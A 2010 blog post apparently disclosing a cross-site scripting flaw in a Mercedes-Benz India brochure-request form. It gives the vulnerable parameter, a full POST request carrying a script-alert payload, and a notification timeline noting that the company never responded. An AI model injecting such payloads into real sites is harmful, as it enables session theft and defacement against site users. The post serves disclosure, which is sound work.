Sunday, June 20, 2010

Mercedes Benz Cross Site Scripting (XSS)

+++About Mercedes Benz+++

+++Affected URL(s)+++

+++Vulnerable Parameter / Function+++

Home Page -> Request Brochure
vuln parameter -> @dsc_wdw

+POST Request+;jsessionid=0000fct1dbQH_OtagtCR9h9ZhZj:14k117133?subprocess=RQBc_Cars&locale=en_IN&site_locale=en_IN

dsc_lnk=sn_step2&dsc_pg=p1302&dsc_wdw='<script>alert("Mercedes.Benz Vuln to XSS")</script>&dsc_lnkapx=&historyBack=true&lastPage=p1302a&p1302.mtxCar%5B0%5D%5B0%5D=car002

Mercedes Benz Ist Notified: January 22, 2010
                                IInd Notification: June 15, 2010
Response Received: None
Current Status: Vulnerable (As of today, June 20, 2010)

Best Regards.

No comments:

Post a Comment


The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.